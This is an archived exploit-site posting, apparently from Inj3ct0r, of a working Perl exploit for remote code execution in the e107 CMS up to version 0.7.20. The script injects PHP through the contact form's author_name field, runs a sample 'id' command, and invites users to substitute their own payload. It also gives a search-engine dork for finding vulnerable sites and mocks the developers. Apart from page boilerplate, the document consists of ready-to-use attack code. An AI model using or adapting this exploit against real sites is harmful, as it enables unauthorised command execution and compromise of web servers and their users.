Home / os / win7

e107 <= 0.7.20 Code Execution Vulnerability

Posted on 24 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>e107 &lt;= 0.7.20 Code Execution Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== e107 &lt;= 0.7.20 Code Execution Vulnerability =========================================== # Exploit Title: e107 Code Exec # Date: 05/22/10 # Author: McFly@e107.org # Software Link: http://e107.org/edownload.php # Version: e107 &lt;= 0.7.20 # Tested on: Linux/Windows #!/usr/bin/perl -w ################################################# # e107 Code Exec // SploitAuthor: McFly@e107.org ################################################# # These scrubs still haven't released an update! # Here is a little bit of motivation for them to # patch one of the most popular, and insecure of # the PHP web apps available today. ################################################# # DORK: inurl:e107_plugins ################################################# use LWP::UserAgent; my $path = $ARGV[0] or die(&quot;Usage: perl e107_phpbb.pl http://e107site/pathto/contact.php &quot;); my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here! :) # Remove comment for proxy support my $proxy = 'http://127.0.0.1:8118/'; $ENV{http_proxy} = $proxy ? $proxy: 0; $ua = new LWP::UserAgent; $ua-&gt;agent(&quot;Mozilla/5.0&quot;); if ( $proxy ) { print &quot;[*] Using proxy $proxy &quot;; $ua-&gt;env_proxy('1'); } my $req = new HTTP::Request POST =&gt; $path; $req-&gt;content_type('application/x-www-form-urlencoded'); $req-&gt;content(&quot;send-contactus=1&amp;author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D&quot;); my $res = $ua-&gt;request($req); my $data = $res-&gt;as_string; if ( $data =~ /&lt;td class=[&quot;']main_section['&quot;]&gt;(.*)/ ) { $data = $1; print &quot;$data &quot;; } else { print &quot;$data &quot;; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP